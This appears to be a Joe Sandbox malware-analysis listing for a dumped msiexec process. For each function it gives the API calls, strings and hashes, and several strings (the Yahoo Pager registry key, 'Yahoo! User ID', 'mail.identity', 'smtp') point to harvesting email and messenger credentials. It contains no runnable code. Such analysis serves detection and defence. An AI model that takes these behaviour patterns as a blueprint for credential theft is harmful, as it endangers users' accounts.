                                                                                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                          APIs
                                                                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                          • memset.MSVCRT ref: 0040330B
                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                          • strchr.MSVCRT ref: 0040335A
                                                                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                          • strlen.MSVCRT ref: 0040339C
                                                                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                          • String ID: Personalities
                                                                                          • API String ID: 2103853322-4287407858
                                                                                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: H
                                                                                          • API String ID: 2221118986-2852464175
                                                                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID: winWrite1$winWrite2
                                                                                          • API String ID: 438689982-3457389245
                                                                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: winRead
                                                                                          • API String ID: 1297977491-2759563040
                                                                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID: gj
                                                                                          • API String ID: 1297977491-4203073231
                                                                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                          • String ID:
                                                                                          • API String ID: 4247780290-0
                                                                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                          APIs
                                                                                          • _strcmpi.MSVCRT ref: 0040E134
                                                                                          • _strcmpi.MSVCRT ref: 0040E14D
                                                                                          • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strcmpi$_mbscpy
                                                                                          • String ID: smtp
                                                                                          • API String ID: 2625860049-60245459
                                                                                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                          • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040C28C
                                                                                          • SetFocus.USER32(?,?), ref: 0040C314
                                                                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FocusMessagePostmemset
                                                                                          • String ID: S_@$l
                                                                                          • API String ID: 3436799508-4018740455
                                                                                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                          • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004092C0
                                                                                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                          Strings
                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                          • API String ID: 408644273-3424043681
                                                                                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                          • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscpy
                                                                                          • String ID: C^@$X$ini
                                                                                          • API String ID: 714388716-917056472
                                                                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                          APIs
                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                          • String ID: MS Sans Serif
                                                                                          • API String ID: 3492281209-168460110
                                                                                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                          • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName_strcmpimemset
                                                                                          • String ID: edit
                                                                                          • API String ID: 275601554-2167791130
                                                                                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                          • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen$_mbscat
                                                                                          • String ID: 3CD
                                                                                          • API String ID: 3951308622-1938365332
                                                                                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                          • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                          APIs
                                                                                            • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$memset
                                                                                          • String ID:
                                                                                          • API String ID: 1860491036-0
                                                                                          • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                          • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040D2C2
                                                                                          • memset.MSVCRT ref: 0040D2D8
                                                                                          • memset.MSVCRT ref: 0040D2EA
                                                                                          • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                          • memset.MSVCRT ref: 0040D319
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 368790112-0
                                                                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                          APIs
                                                                                          Strings
                                                                                          • too many SQL variables, xrefs: 0042C6FD
                                                                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                          • API String ID: 2221118986-515162456
                                                                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                          APIs
                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                          • memset.MSVCRT ref: 004026AD
                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                            • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                            • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 3503910906-0
                                                                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                          APIs
                                                                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                          • strlen.MSVCRT ref: 0040B60B
                                                                                          • atoi.MSVCRT(?), ref: 0040B619
                                                                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                          • String ID:
                                                                                          • API String ID: 4107816708-0
                                                                                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                          • _gmtime64.MSVCRT ref: 00411437
                                                                                          • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                          • strftime.MSVCRT ref: 00411476
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                          • String ID:
                                                                                          • API String ID: 1886415126-0
                                                                                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen
                                                                                          • String ID: >$>$>
                                                                                          • API String ID: 39653677-3911187716
                                                                                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                          • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: @
                                                                                          • API String ID: 3510742995-2766056989
                                                                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strcmpi
                                                                                          • String ID: C@$mail.identity
                                                                                          • API String ID: 1439213657-721921413
                                                                                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00444573
                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValuememset
                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                          • API String ID: 3363972335-1703613266
                                                                                          • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                          • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00406640
                                                                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                          • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                          • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
